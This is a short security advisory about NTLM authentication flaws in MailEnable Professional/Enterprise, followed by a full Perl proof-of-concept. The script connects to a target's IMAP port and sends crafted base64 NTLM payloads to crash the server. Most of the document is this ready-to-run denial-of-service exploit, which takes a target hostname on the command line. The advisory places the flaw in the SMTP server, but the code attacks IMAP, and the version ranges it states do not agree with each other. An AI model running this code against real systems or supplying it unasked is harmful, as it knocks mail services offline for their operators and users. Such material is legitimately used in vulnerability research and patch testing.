source: https://www.securityfocus.com/bid/20290/info
MailEnable is prone to multiple remote vulnerabilities.
These issues arise in the SMTP server during NTLM authentication and may facilitate arbitrary code execution or denial-of-service conditions.
MailEnable Professional 2.0 and MailEnable Enterprise 2.0 are reported vulnerable to these issues.
#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
# Mail Enable Professional v2.33 (win32)
# Mail Enable Professional v2.34 (win32)
# Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#
########
use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;
&print_header;
my $target;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }
my $imapd_port = 143;
my $send_delay = 2;
my $PAD = 'A';
if (connect_host($target, $imapd_port)) {
print("-> * Connected\n");
send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
sleep($send_delay);
$buf = ($PAD x 12).
"\xfa\xff\xff\xff".
($PAD x 12);
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);
$buf = ($PAD x 28).
"\x00\x01".
($PAD x 2).
"\xef\xbe\xad\xde";
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);
print("-> * Successfully sent payload!\n");
}
sub print_header {
print("MailEnable Pro <=v2.36 DoS POC\n");
print("by: <mu-b\@digit-labs.org>\n\n");
}
sub usage {
print(qq(Usage: $0 -t <hostname>
-t <hostname> : hostname to test
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
return(1338);
}